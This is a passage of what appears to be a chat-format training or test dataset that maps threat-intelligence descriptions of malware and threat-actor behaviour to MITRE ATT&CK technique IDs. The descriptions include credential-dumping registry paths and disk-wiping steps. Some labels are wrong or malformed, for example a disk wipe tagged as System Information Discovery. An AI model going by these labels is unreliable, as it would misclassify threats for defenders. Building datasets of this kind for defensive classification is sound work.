description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Bankshot uploads files and secondary payloads to the victim's machine." }, { "role": "assistant", "content": "T1105 - Ingress Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "This time, weaponized lure documents claiming to contain seminar information on environmental protection were observed exploiting known Microsoft Office vulnerabilities CVE-2017-0199 and CVE-2017-11882 to drop and execute the backdoor binary on the victim’s machine" }, { "role": "assistant", "content": "T1203 - Exploitation for Client Execution" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "IceApple's Credential Dumper module can dump LSA secrets from registry keys, including: `HKLM\\SECURITY\\Policy\\PolEKList\\default`, `HKLM\\SECURITY\\Policy\\Secrets\\*\\CurrVal`, and `HKLM\\SECURITY\\Policy\\Secrets\\*\\OldVal`." }, { "role": "assistant", "content": "T1003.004 - OS Credential Dumping: LSA Secrets" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "can dump passwords and save them into \\ProgramData\\Mail\\MailAg\\pwds.txt." }, { "role": "assistant", "content": "T1003 - OS Credential Dumping" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "POWERSTATS can sleep for a given number of seconds." }, { "role": "assistant", "content": "T1029 - Scheduled Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Deleting volume shadow copies is very typical behavior of ransomware. The Nefilim ransomware uses WMIC with the following command to delete all volume shadow copies on the system to prevent recovery. WMIC is a command-line utility to access WMI." }, { "role": "assistant", "content": "T1490 - Inhibit System Recovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Rocke used scripts which detected and uninstalled antivirus software." }, { "role": "assistant", "content": "T1518.001 - Software Discovery: Security Software Discovery', 'T1562.001 - Impair Defenses: Disable or Modify Tools" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Psylo exfiltrates data to its C2 server over the same protocol as C2 communications." }, { "role": "assistant", "content": "T1041 - Exfiltration Over C2 Channel" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "APT39 has used CrackMapExec and a custom port scanner known as BLUETORCH for network scanning." }, { "role": "assistant", "content": "T1046 - Network Service Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "OilRig has delivered malicious links to achieve execution on the target system." }, { "role": "assistant", "content": "T1204.001 - Malicious Link" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "uses HTTP for C2." }, { "role": "assistant", "content": "T1071 - Application Layer Protocol" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Rifdoor has been distributed in e-mails with malicious Excel or Word documents." }, { "role": "assistant", "content": "T1566.001 - Phishing: Spearphishing Attachment" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "can steal access tokens from exiting processes and make tokens from known credentials." }, { "role": "assistant", "content": "T1134 - Access Token Manipulation" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Magic Hound has sent malicious URL links through email to victims. In some cases the URLs were shortened or linked to Word documents with malicious macros that executed PowerShells scripts to download Pupy." }, { "role": "assistant", "content": "T1566.002 - Phishing: Spearphishing Link" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "is a UEFI BIOS rootkit developed by the company Hacking Team to persist remote access software on some targeted systems." }, { "role": "assistant", "content": "T1014 - Rootkit', 'T1542.001 - Pre-OS Boot: System Firmware" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Before writing to disk, inserts a randomly generated string into the middle of the decrypted payload in an attempt to evade hash-based detections." }, { "role": "assistant", "content": "T1027.001 - Obfuscated Files or Information: Binary Padding" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "APT1 used the commands \"net localgroup\",\"net user\", and \"net group\" to find accounts on the system." }, { "role": "assistant", "content": "T1087.001 - Account Discovery: Local Account" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Saint Bot has renamed malicious binaries as `wallpaper.mp4` and `slideshow.mp4` to avoid detection." }, { "role": "assistant", "content": "T1036 - Masquerading" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Reaver queries the Registry to determine the correct Startup path to use for persistence." }, { "role": "assistant", "content": "T1012 - Query Registry" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "has used Mshta.exe to execute its payload." }, { "role": "assistant", "content": "T1218.005 - Signed Binary Proxy Execution: Mshta" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "A USB data collecting tool that checks for a connected USB drive and steals certain file types, encrypting them into a RAR file." }, { "role": "assistant", "content": "T1025 - Data from Removable Media" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "One variant of uses HTTP and HTTPS for C2." }, { "role": "assistant", "content": "T1071 - Application Layer Protocol" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "has used RDP to move laterally to systems in the victim environment." }, { "role": "assistant", "content": "T1021.001 - Remote Services: Remote Desktop Protocol" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Dtrack’s dropper can list all running processes." }, { "role": "assistant", "content": "T1057 - Process Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Check the email sender, subject, and body for anything suspicious before downloading and opening email attachments. Check the file extension of the attached file and make sure it is the intended file format. Avoid activating macro for any attached Microsoft Office files, especially for emails that request macro activation using an image of the body of the opened file or those that don’t show anything. Subtle changes to a popular URL can be one indicator of malicious content" }, { "role": "assistant", "content": "T1204.002 - User Execution: Malicious File" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "During Operation CuckooBees, the threat actors used the `query user` and `whoami` commands as part of their advanced reconnaissance." }, { "role": "assistant", "content": "T1033 - System Owner/User Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The \"Office Test\" persistence mechanism allows threat actors to execute a Trojan each time a user runs any of the Office applications. This persistence mechanism loads a malicious DLL by leveraging a registry key that appears to be used during the development and testing of Microsoft Office applications. The use of this registry key for persistence is quite clever, as it requires user interaction to load and execute the malicious payload, which makes automated analysis in sandboxes challenging. Low awareness of this persistence method, coupled with the sandbox evasion obtained from user interactions, makes this a potentially attractive persistence method that we believe may be used in future attacks. Unit 42 suggests monitoring for systems that have this registry key already created, as it is possible a threat is already using the key for persistence purposes. Microsoft has added the “Office Test” registry keys to its Autoruns tool for detection purposes as well. Also, we suggest disabling this persistence method by creating the “Office test” registry key in read-only mode as outlined in this blog" }, { "role": "assistant", "content": "T1137.002 - Office Application Startup: Office Test" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Windshift has sent spearphishing emails with links to harvest credentials and deliver malware." }, { "role": "assistant", "content": "T1566.002 - Phishing: Spearphishing Link" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Emotet has been observed to hook network APIs to monitor network traffic." }, { "role": "assistant", "content": "T1040 - Network Sniffing" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The attack typically begins with an attempt – most probably via a spearphishing email – to lure the intended victim into running the malicious dropper, which is attached to the email. In order to increase the likelihood that the unsuspecting victim will actually click on it, the malicious executable masquerades as a document or spreadsheet by displaying a fake icon" }, { "role": "assistant", "content": "T1566.001 - Phishing: Spearphishing Attachment', 'T1204.002 - User Execution: Malicious File" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "can gather victim drive information." }, { "role": "assistant", "content": "T1083 - File and Directory Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The SOMBRAT backdoor is packaged as a 64-bit Windows executable. It communicates with a configurable command and control (C2) server via multiple protocols, including DNS, TLS-encrypted TCP, and potentially WebSockets. The backdoor's primary purpose is to download and execute plugins provided via the C2 server. In contrast to the SOMBRAT version published in November 2020, Mandiant observed additional obfuscation and armoring to evade detection, this SOMBRAT variant has been hardened to discourage analysis. Program metadata typically included by the compiler has been stripped and strings have been inlined and encoded via XOR-based routines" }, { "role": "assistant", "content": "T1095 - Non-Application Layer Protocol" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "BAT files were used to download and execute the Cring ransomware on the other systems in the compromised network. It also uses the Windows CertUtil program to help with the said download." }, { "role": "assistant", "content": "T1105 - Ingress Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "MacSpy can steal clipboard contents." }, { "role": "assistant", "content": "T1115 - Clipboard Data" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "BLUELIGHT can harvest cookies from Internet Explorer, Edge, Chrome, and Naver Whale browsers." }, { "role": "assistant", "content": "T1539 - Steal Web Session Cookie" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Cobalt Strike can mimic the HTTP protocol for C2 communication, while hiding the actual data in either an HTTP header, URI parameter, the transaction body, or appending it to the URI." }, { "role": "assistant", "content": "T1001.003 - Protocol or Service Impersonation" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "uploads files and secondary payloads to the victim's machine." }, { "role": "assistant", "content": "T1105 - Ingress Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Tropic Trooper used \"netview\" to scan target systems for shared resources." }, { "role": "assistant", "content": "T1135 - Network Share Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "APT19 used HTTP for C2 communications. APT19 also used an HTTP malware variant to communicate over HTTP for C2." }, { "role": "assistant", "content": "T1071.001 - Application Layer Protocol: Web Protocols" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "has a command to delete files." }, { "role": "assistant", "content": "T1070.004 - Indicator Removal on Host: File Deletion" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Earth Lusca has used compromised web servers as part of their operational infrastructure." }, { "role": "assistant", "content": "T1584.004 - Server" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "OceanSalt can collect the name and ID for every process running on the system." }, { "role": "assistant", "content": "T1057 - Process Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The purpose of this malware is to allow the actors to download and execute an executable file, as well as download and run batch files to run commands on the end system" }, { "role": "assistant", "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "1) It uses the application programming interface (API) CreateFileA to \\\\.\\PHYSICALDRIVE0 to retrieve the handle of the hard disk. 2) It overwrites the first sector of the disk (512 bytes) with \"0x00\". The first sector is the disk’s MBR. 3) It will try to perform the routines above (steps 1-2) on \\\\.\\PHYSICALDRIVE1, \\\\.\\PHYSICALDRIVE2, \\\\.\\PHYSICALDRIVE3, and so on, as long as a hard disk is available" }, { "role": "assistant", "content": "T1082 - System Information Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Dragonfly has used various types of scripting to perform operations, including batch scripts." }, { "role": "assistant", "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "AppleJeus has required user execution of a malicious MSI installer." }, { "role": "assistant", "content": "T1204.002 - User Execution: Malicious File" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The malware calls User32.dll's GetKeyboardLayoutList function, inspects the keyboard identifier, and returns true if the result ends in a value between \\x18 thru \\x44 inclusive. This result means the compromised host is whitelisted based on the host's configured keyboard layout. The malware inspects only the lower byte of the full keyboard identifier, so all systems using the keyboard locales listed in Table 4 are immune to REvil. Despite the large number of potential matches, CTU researchers suspect that the malware author intended to identify Russian keyboards based on several other links to the Russia-based GandCrab ransomware" }, { "role": "assistant", "content": "T1082 - System Information Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "obfuscates strings using a custom stream cipher." }, { "role": "assistant", "content": "T1027 - Obfuscated Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "SUGARDUMP can search for and collect data from specific Chrome, Opera, Microsoft Edge, and Firefox files, including any folders that have the string `Profile` in its name." }, { "role": "assistant", "content": "T1083 - File and Directory Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The TerraLoader code performs several integrity checks before dropping the payload. These checks implement anti-debugging techniques and try to identify anomalies to prevent execution in sandboxed environments. Some of these techniques range from detecting incorrect parameters, filenames and extensions, to detecting hardware breakpoints or identifying specific modules loaded into the subject process. Should these checks all pass, the actual payload is decrypted and executed" }, { "role": "assistant", "content": "T1497.001 - Virtualization/Sandbox Evasion: System Checks" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Audit all remote authentications from trusted networks or service providers. Detect mismatches by correlating credentials used within internal networks with those employed on external-facing systems. Log use of system administrator commands such as net, ipconfig, and ping" }, { "role": "assistant", "content": "T1133 - External Remote Services" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "A .dll file is digitally signed by a certificate from AirVPN." }, { "role": "assistant", "content": "T1553.002 - Code Signing" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Once executed, NavRAT will immediately leverage cmd.exe to perform a systeminfo and a tasklist check on the system it is running on while writing the output to a TMP file, once again attempting to hide within an AhnLab folder. Interestingly, the attacker has used the >> method to append to the file so there can be multiple outputs written to their single TMP file" }, { "role": "assistant", "content": "T1074.001 - Data Staged: Local Data Staging" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "LightNeuron contains a function to encrypt and store emails that it collects." }, { "role": "assistant", "content": "T1560 - Archive Collected Data" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Azorult can capture screenshots of the victim’s machines." }, { "role": "assistant", "content": "T1113 - Screen Capture" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "There are two forms of encrypted strings: an RSA256-encrypted string, and custom base64-encoded and RSA256-encrypted string" }, { "role": "assistant", "content": "T1027 - Obfuscated Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "APT18 actors deleted tools and batch files from victim systems." }, { "role": "assistant", "content": "T1070.004 - Indicator Removal on Host: File Deletion" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Lucifer can identify the IP and port numbers for all remote connections from the compromised host." }, { "role": "assistant", "content": "T1049 - System Network Connections Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Ke3chang has used credential dumpers or stealers to obtain legitimate credentials, which they used to gain access to victim accounts." }, { "role": "assistant", "content": "T1078 - Valid Accounts" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Malicious .lnk files contain a link to a URL (instead of the expected local URI) to grab the next payload" }, { "role": "assistant", "content": "T1547.009 - Boot or Logon Autostart Execution: Shortcut Modification" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "ServHelper may download additional files to execute." }, { "role": "assistant", "content": "T1105 - Ingress Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "CHOPSTICK encrypts C2 communications with TLS." }, { "role": "assistant", "content": "T1573.002 - Asymmetric Cryptography" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Ngrok can tunnel RDP and other services securely over internet connections." }, { "role": "assistant", "content": "T1572 - Protocol Tunneling" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Strings in the malware are obfuscated using the RC4 algorithm and the decryption key stored inside the sample" }, { "role": "assistant", "content": "T1027 - Obfuscated Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "GoldMax will check if it is being run in a virtualized environment by comparing the collected MAC address to \"c8:27:cc:c2:37:5a\"." }, { "role": "assistant", "content": "T1497.001 - Virtualization/Sandbox Evasion: System Checks" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "StoneDrill can check for antivirus and antimalware programs." }, { "role": "assistant", "content": "T1518.001 - Software Discovery: Security Software Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Windshift has created LNK files in the Startup folder to establish persistence." }, { "role": "assistant", "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "uses GET and POST requests over HTTP or HTTPS for command and control to obtain commands and send ZLIB compressed data back to the C2 server." }, { "role": "assistant", "content": "T1071 - Application Layer Protocol" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Earth Lusca has used a \"DCSync\" command with Mimikatz to retrieve credentials from an exploited controller." }, { "role": "assistant", "content": "T1003.006 - OS Credential Dumping: DCSync" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Cannon uses SMTP/S and POP3/S for C2 communications by sending and receiving emails." }, { "role": "assistant", "content": "T1071.003 - Mail Protocols" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "REvil can use Native API for execution and to retrieve active services." }, { "role": "assistant", "content": "T1106 - Native API" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Stuxnet can propagate via removable media using an autorun.inf file or the CVE-2010-2568 LNK vulnerability." }, { "role": "assistant", "content": "T1091 - Replication Through Removable Media" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "NanoCore can open a remote command-line interface and execute commands. NanoCore uses JavaScript files." }, { "role": "assistant", "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "KONNI has executed malicious JavaScript code." }, { "role": "assistant", "content": "T1059.007 - Command and Scripting Interpreter: JavaScript" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "A uses a encrypted and compressed payload that is disguised as a bitmap within the resource section of the installer." }, { "role": "assistant", "content": "T1027 - Obfuscated Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The frequent checking ensures that any changes made will be quickly followed, and the repeated attempts to run the Revenge RAT binary make it almost certain that even if the process is terminated, the RAT will be running again soon" }, { "role": "assistant", "content": "T1057 - Process Discovery', 'T1043 - Commonly Used Port" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "creates a backdoor through which remote attackers can retrieve a list of running processes." }, { "role": "assistant", "content": "T1057 - Process Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "performs the tasklist command to list running processes." }, { "role": "assistant", "content": "T1057 - Process Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Daserf hides collected data in password-protected .rar archives." }, { "role": "assistant", "content": "T1560 - Archive Collected Data', 'T1560.001 - Archive Collected Data: Archive via Utility" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "BUBBLEWRAP is a full-featured backdoor that is set to run when the system boots, and can communicate using HTTP, HTTPS, or a SOCKS proxy. This backdoor collects system information, including the operating system version and hostname, and includes functionality to check, upload, and register plugins that can further enhance its capabilities" }, { "role": "assistant", "content": "T1082 - System Information Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Kimsuky has created new services for persistence." }, { "role": "assistant", "content": "T1543.003 - Create or Modify System Process: Windows Service" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "ShadowPad has used DNS tunneling for C2 communications." }, { "role": "assistant", "content": "T1071.004 - Application Layer Protocol: DNS" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "SLOTHFULMEDIA has created a service on victim machines named \"TaskFrame\" to establish persistence." }, { "role": "assistant", "content": "T1543.003 - Create or Modify System Process: Windows Service" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Similar to many other ransomware operators, CARBON SPIDER not only encrypted victim files using Darkside, but also exfiltrated data for publication on a dedicated leak site (DLS) hosted on Tor. For exfiltration, CARBON SPIDER primarily leveraged the MEGASync client for hosting provider MEGA but also employed GoToAssist" }, { "role": "assistant", "content": "T1567.002 - Exfiltration Over Web Service: Exfiltration to Cloud Storage" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", 